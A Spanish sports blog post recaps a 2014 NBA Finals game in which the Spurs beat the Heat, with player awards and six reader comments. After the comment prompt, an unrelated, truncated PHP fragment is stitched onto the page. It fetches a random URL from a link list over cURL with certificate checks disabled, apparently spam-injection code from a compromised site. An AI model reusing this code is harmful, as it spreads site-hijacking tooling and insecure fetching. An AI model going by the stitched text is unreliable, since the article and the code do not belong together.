La Crónica: La llegada de la caballería

11 de June de 2014 por TheDeerHunter

Comentábamos el otro día que, con el Big Three de San Antonio jugando bien, era el resto quien debía de marcar la diferencia. Anoche por fin ese “resto” mostró sus virtudes infligiendo un duro correctivo a los campeones en su primer partido en casa, rompiéndoles una inmaculada racha local de 11 victorias consecutivas, recuperando la ventaja campo y dándoles jaque para el próximo encuentro. Todo en uno.

Salieron imparables los Spurs. Anotaron 41 puntos en el primer cuarto y protagonizaron la primera parte más eficaz de todos los tiempos (71 puntos, 75.8% de acierto). Kawhi Leonard, que había pasado un auténtico calvario durante los dos primeros choques, se desquitó con el mejor partido de su carrera en ambos lados de la cancha. No sólo encontró la forma de negar a LeBron James muchos lanzamientos, sino que le provocó un inusual número de pérdidas (hasta 7, el peor registro de su carrera). Sólo en la primera parte ya había igualado su producción ofensiva de los dos primeros pero iba a terminar con 29 puntos y un fantástico 10 de 13 en tiro, máximo artillero. También Danny Green se destapó con una actuación determinante. 15 puntos, con un único lanzamiento fallado y hasta 5 robos de balón. Lo más extraordinario fue la manera con la que Duncan, Parker y Ginobili se apartaban de los focos para dejar fluir el juego a través de sus compañeros. Apenas 40 puntos y 23 lanzamientos entre los tres, frente a los 53 y 29 de Leonard, Green y Diaw. El verdadero espíritu de esta escuadra.

Los Heat sufrieron un castigo brutal pero si no fueran un equipo tan fabuloso probablemente estaríamos hablando de un palizón de entre 40 y 50 puntos de diferencia. Encajaron con templanza el chaparrón de la primera parte y sacaron las garras en el tercer cuarto en el que llegaron a diluir una desventaja de 21 puntos a tan sólo 7. Anoche no era fácil dejar a sus rivales en 15 puntos en un cuarto pero gracias al temprano bonus que se encontraron y al acierto en el triple se volvieron a meter en la pomada. Curiosamente la remontada fue abortada por la única canasta de Marco Belinelli, un triple que devolvía el margen psicológico de los 10 puntos. A partir de ese momento los de Popovich recuperaban la iniciativa definitivamente. 

El último cuarto fue el más insípido de lo que llevamos de finales. Los Heat se metieron pronto en problemas de faltas y a mitad del mismo bajaron los brazos. Popovich terminaba el choque con Joseph, Belinelli, Bonner, Baynes y Ayres pensando más en cómo romper esa racha de los Heat que dice que hace mucho tiempo que no pierden dos partidos de manera consecutiva. Si los Spurs no lo hacen en lo que queda serán campeones.

PREMIOS

MVP: Todos pedíamos a gritar la aparición de Kawhi Leonard y el joven alero de los Spurs nos respondió con creces: 29 puntos (10 de 13 TC), 4 rebotes, 2 tapones y 2 robos. Brutal tanto en ataque como en defensa.

Sorpresa: Que Danny Green anote 15 puntos tampoco ha de hacernos arquear las cejas pero que lo haga anotando solo un triple… Los 5 robos que consiguió tuvieron mucha culpa.

Decepción: No están siendo las mejores finales de Mario Chalmers. Ayer falló los 5 tiros que intentó y perdió 3 balones.

Esfuerzo en vano: Muy discretos para lo que son ellos pero aún así los mejores de su equipos. Lebron James y Dwyane Wade anotaron 44 puntos pero acumularon hasta 12 pérdidas producto de la enorme defensa de sus pares. Rashard Lewis (14p) sigue a lo suyo, una agradable sorpresa.

Imágenes | AP Photos / Getty Images

Comenta

6 comentarios a esta entrada

  1. rumbero dice:
    #1

    Escandaloso. Lo de los Spurs es una redención en toda regla con aquellos que los odiábamos no hace tanto. Que manera de jugar… Eso sí, Miami sin perder la cara al partido a pesar de un mal Lebron. El año pasado empezaron también con un 1-2, veremos como va

      Citar

  2. Arivas dice:
    #2

    Pues si. Tremendos los spurs, partidazo. Complicado hacerlo mejor.

    Aun así yo vi opciones de remontada en el tercer cuarto ( se acercaron a 7 creo) por parte de Miami lo cual habla muy bien de ellos.

    El próximo partido clave para Miami, pero como SA siga a este nivel lo tendrán complicado.

      Citar

  3. Mamba_Blanca dice:
    #3

    Para mi, jugada maestra de Popovich metiendo a Diaw en el quinteto titular. No hizo un partido muy llamativo estadisticamente hablando, pero con el en pista los Spurs se sienten muchisimo mas comodos.

      Citar

  4. HisRoyalAirness dice:
    #4

    Aún a riesgo de que Denise me llame conspiranoico, cada día me harta más la manía de los árbitros/la liga de dar emoción a los partidos. Provocan remontadas o amagos de pitando todo lo pitable por momentos, para que la gente no deje el partido a medias. Todas las remontadas son en los terceros cuartos.
    Me juego algo a que si pueden volver a llevarlo a 7 partidos lo llevan

      Citar

  5. GreenPride dice:
    #5

    Bueno pues partidazo de San Antonio y recuperación de la ventaja de campo con victoria en Florida a las primeras de cambio.
    De salida Kawhi se disfrazó de LeBron y todos los Spurs se mostraron infalibles durante dos cuartos de ensueño en ataque donde los Heat no sabían ni por donde les venían los puntos en una verdadera exhibición de basket coral de los Spurs. Unos desconcertados Heat intentaron una primera reacción a base de triples en el segundo cuarto que bajó la diferencia de 25 a 15 sólo para ver cómo los Spurs seguían a lo suyo y la volvían a colocar en 21 al descanso. Y si la diferencia no fue mayor fue porque los Heat cumplieron más que de sobra en ataque que ante otro equipo la paliza habría sido de escándalo. Así las cosas se esperaba una reacción atrás de los Heat en la reanudación… y vaya si lo hicieron. Se acabaron las canastas fáciles y el movimiento de balón sin oposición de los Spurs en el tercer cuarto y los Heat apretaron en defensa y mantuvieron acierto en ataque hasta colocarse a 7 y con la sensación de que podían remontar.
    Sin embargo ahí les fallaron las fuerzas con un LeBron genialmente defendido por Kawhi y las ayudas de los demás y los expertos Spurs consiguieron aumentar de nuevo su ventaja hasta hacer rendirse a los de Miami.
    Ahora la presión es claramente para los Heat que se encuentran con una partido casi a vida o muerte en el 4º. Deberán mostrar la defensa de la segunda parte desde el principio para que el partido esté igualado como los 2 primeros en San Antonio. Enfrente los Spurs tienen una gran oportunidad de darles el golpe definitivo ya que con 3-1 a favor y 2 partidos más en casa sería casi imposible que se dejaran el anillo.
    Toca apretar al rey y sus vasallos…

      Citar

  6. GreenPride dice:
    #6

    Contra los apuntes conspiranoicos de HisRoyal decir que en las Finales del Oeste hubo 5 palizas de 6 partidos…..

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>